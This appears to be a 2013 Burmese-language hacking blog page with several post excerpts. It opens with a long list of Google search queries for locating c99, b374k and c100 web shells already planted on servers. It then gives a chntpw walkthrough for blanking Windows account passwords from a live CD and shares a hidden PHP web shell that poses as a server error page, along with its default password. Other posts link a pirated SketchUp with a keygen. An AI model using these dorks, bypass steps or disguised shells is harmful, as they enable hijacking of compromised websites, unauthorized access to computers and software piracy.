inurl:"/c99.php"
c99 shell v.1.0 (roots)
allintitle: "c99shell"
allinurl: "c99.php"
intitle:C99Shell v. 1.0 pre-release +uname
inurl:"c99.php" c99shell
inurl:/c99.php+uname
c99shell [file on secure ok ]?
powered by Captain Crunch Security Team
"c99.php" filetype:php
allinurl:c99.php
c99. PHP-code Feedback Self remove
download c99.php
intitle:C99Shell v. 1.0 pre-release +uname
c99.php download
c99shell filetype:php -echo
inurl:"c99.php"
C99Shell v. 1.0 pre-release build #5
--[ c99shell v. 1.0 pre-release build #16
c99shell linux infong
C99Shell v. 1.0 pre-release build
!C99Shell v. 1.0 beta!
Encoder Tools Proc. FTP brute Sec. SQL PHP-code
Update Feedback Self remove Logout
!c99shell v. 1+Safe-mode: OFF (not secure)
"C99Shell v. 1.0 pre-release build "
intitle:c99shell +filetype:php
intitle:C99Shell v. 1.0 pre-release +uname
intitle:!C99Shell v. 1.0 pre-release build #16! root
!C99Shell v. 1.0 pre-release build #5!
inurl:"c99.php"
C99Shell v. 1.0 pre-release build #16!
intitle:c99shell intext:uname
allintext:C99Shell v. 1.0 pre-release build #12
--[ c99shell v. 1.0 pre-release build #15 | Powered
by ]--
Encoder Tools Proc. FTP brute Sec. SQL PHP-code
Update Feedback Self remove Logout
"c99shell v 1.0"
ftp apache inurl:c99.php
c99shell+v.+1.0 16
intitle:c99shell "Software: Apache"
allintext: Encoder Tools Proc. FTP brute Sec. SQL
PHP-code Update Feedback Self remove
intitle:c99shell uname -bbpress
intitle:"index.of" c99.php
inurl:admin/files/
intitle:"index of /" "c99.php"
intitle:"index of" intext:c99.php
intitle:index.of c99.php
intitle:index/of file c99.php
intitle:"Index of/"+c99.php
c99.php "intitle:Index of "
intitle:index.of c99.php
intitle:"Index of/"+c99.php

b374k Shells
inurl:b374k.php


c100 Shells
inurl:c100.php Generation time:
Read more »

9/20/2013

Kali Linux ကိုအသံုးျပဳျပီး Window Password ကို reset ခ်နည္း

Kali Linux Live CD ရွိဖို ့ေတာ့လိုအပ္တယ္ခင္ဗ်။ Live CD လုပ္ဖို ့အတြက္ကေတာ့ Kali Linux ကို download လုပ္ျပီး ISO ကို CD/DVD ေပၚမွာ burn လုပ္လိုက္ပါ။Password Reset လုပ္မယ့္စက္ကို boot menu ေခၚျပီး Live (forensic mode) ကိုေရြးပါ။ အဲ့ဒီအခါ Kali Linux initialize ျဖစ္လာျပီး load လုပ္တဲ့အခါ Terminal Window ပြင့္လာျပီး တဲ့အခါမွာ window password database file ကို navigate လုပ္ေပးရပါမယ္။ အဲ့လိုလုပ္ေပးဖို ့အတြက္ Window Version ေတာ္ေတာ္မ်ားမ်ားမွာ window password ေတြကို SAM ဆိုတဲ့ file နာမည္နဲ ့save လုပ္ထားေလ့ရွိပါတယ္။ အဲ့ဒီ file ဟာလည္း /Windows/System32/config ဆိုတဲ့ path မွာပဲ ရွိပါတယ္။ ဒါေၾကာင့္ SAM database ဟာ သင့္ကြန္ပ်ဴတာမွာ /media/name_of_hard_drive/Windows/System32/config ဆိုျပီးရွိပါလိမ့္မယ္။ 

 အဲ့ဒီေနာက္ ls  -l  SAM* ဆိုျပီး ရိုက္ထည့္လိုက္ရင္ SAM Log ေတြ ကိုေအာက္က ပံုအတိုင္းေတြ ့ရပါလိမ့္မယ္။
ေနာက္တဆင့္အေနနဲ ့ chntpw  -l  SAM ဆိုတဲ့ command ကို အသံုးျပဳျခင္းျဖင့္ window system ထဲမွာရွိတဲ့ user name ေတြကို ျမင္ရမွာျဖစ္ပါတယ္။

user name ေတြ ရျပီဆိုရင္ေတာ့ chntpw  -u  "username"  SAM ဆိုတဲ့ command ကို အသံုးျပဳျပီး password reset ခ်ႏုိင္ပါတယ္။ ကြ်န္ေတာ္ေအာက္ကပံုထဲမွာ Administrator ဆိုတဲ့ username ကို အသံုးျပဳျပီး နမူနာျပထားပါတယ္။ ဒါေၾကာင့္ chntpw  -u  "Administrator"  SAM ဆိုတဲ့ command ကိုရိုက္ထည့္လိုက္တဲ့အခါ ေအာက္ပါအတိုင္းေတြ ့ရပါလိမ့္မယ္။
 အဲ့ဒီ option ေတြထဲကမွ Clear (blank) user password ဆုိတာကို ေရြးျခယ္ေစခ်င္ပါတယ္။
အဲ့ဒါဆိုရင္ window ကို password မထည့္ပဲ ( password ေနရာမွာဘာမွမျဖည့္ပဲ ) Login လုပ္နုိင္ျပီျဖစ္ပါတယ္။

Credit: Ko @lpha

Read more »

Nmap Cookbook

NMAP Cookbook nmap ဆုိရင္ Hacking ေလ့လာ ေနတဲ့ညီကို တစ္ခ်ဳိ  ့သိျပီးသားပါ...
Window ေပၚမွာလည္း ဒီေကာင္က အသုံးျပဳ  ့လုိ ့ရပါတယ္။ အထူးသျဖင့္ Network Scanning လုပ္တဲ့ေနရာမွာ ေတာ္ေတာ္ေလး အသုံး၀င္တဲ့ နည္းပညာ ရပ္တစ္မ်ဳိးပါ..
လုိ အပ္သူမ်ား ေဒါင္းေလာ့ရယူနုိင္ပါျပီ.။။
Download Link : Mirrorcreator SolidFiles   
Copy@ http://www.minsoeyarsar.com/2013/09/nmap-cookbook-fat-free-guide-to-network.html
Read more »

9/19/2013

Google SketchUp Pro 2013 13.0.4812 Full + Patch

ဒီေကာင္ကုိ အရင္က ပုိစ္႔စ္ခုမွ Comment ေရးျပီးေမးထားတာ အခုမွသူမ်ားေတြဘေလာ့မွာ ေတြ႕လုိ႔ျပန္ရွယ္ေပးလုိက္ပါတယ္။ အမွန္အတုိင္းေျပာရရင္ ကြ်န္ေတာ္ ဒီ ေဆာ့ဝဲလ္ကုိ မသုံးဖူးပါဘူး။ AutoCAD လုိေဆာ့ဝဲလ္အျဖစ္ အသုံးခ်ႏုိင္မယ့္ Tool တစ္ခုထင္ပါတယ္။ လင့္ကုိေတာ့ Tusfiles ကေနျဖစ္ပါတယ္။ ကြ်န္ေတာ္တင္တာမဟုတ္ပါဘူး။ သူမ်ားေတြတင္တာကေန ျပန္ရွယ္ေပးရုံပါ။ အဆင္ေျပၾကပါေစဗ်ာ။

Download: Keygen
Read more »

Surabaya Blackhat Shell V.2.0

Shell ေတြလုိက္စမ္းရင္း ဒီ shell ေလးေတြ႔မိလုိ႔ ျပန္ရွယ္လုိက္ပါတယ္။ ဒီ shell ေလးကနည္းနည္းေတာ့ ထူးျခားတယ္ဗ်။ ဆရာသမားေတြကေတာ့ သိျပီးသားလားမသိဘူး။ 404 not found shell လုိမ်ဳိးပါ။ shell link ကုိေခၚလုိက္ရင္ 404 Not Found ဆုိျပီးျပေတာ့ သာမန္လူေတြကေတာ့ လွည့္ျပန္သြားမွေသခ်ာပါတယ္။ ဒါေပမယ့္ ဒီေကာင္ကေတာ့ 404 Not Found လုိ႔မျပဘဲ Internal Server Error ဆုိျပီးျပပါတယ္။ အကြက္ဆန္းေလးနဲ႔ပါ။ ဟီး ဒါေပမယ့္ Tab တစ္ခ်က္ႏွိပ္လုိက္တာနဲ႔ password ရုိက္စရာေပၚလာပါမယ္။ အဲဒီကေနမွ shell access ကုိဝင္လုိ႔ရမွာျဖစ္ပါတယ္။ ဒီ shell ဟာလည္း အေကာင္းဆုံး hidden shell ေတြထဲကတစ္ခုလုိ႔ဆုိရမွာပါ။ Default password က surabayablackhat ျဖစ္ပါတယ္။ 



ကုိယ္လုိခ်င္တဲ့ password ေျပာင္းခ်င္ေပမယ့္ ကြ်န္ေတာ္ရွာၾကည့္တာ မေတြ႕ေသးလုိ႔ ဒီအတုိင္းပဲတင္ေပးလုိက္ပါတယ္။ ညီအကုိေတြဘယ္ကေနေျပာင္းလုိ႔ရတယ္ဆုိတာေတြ႕ရင္ ကြ်န္ေတာ္ကုိလည္း ေျပာျပပါအုံး။ 

Download: RGhost Solidfiles
Read more »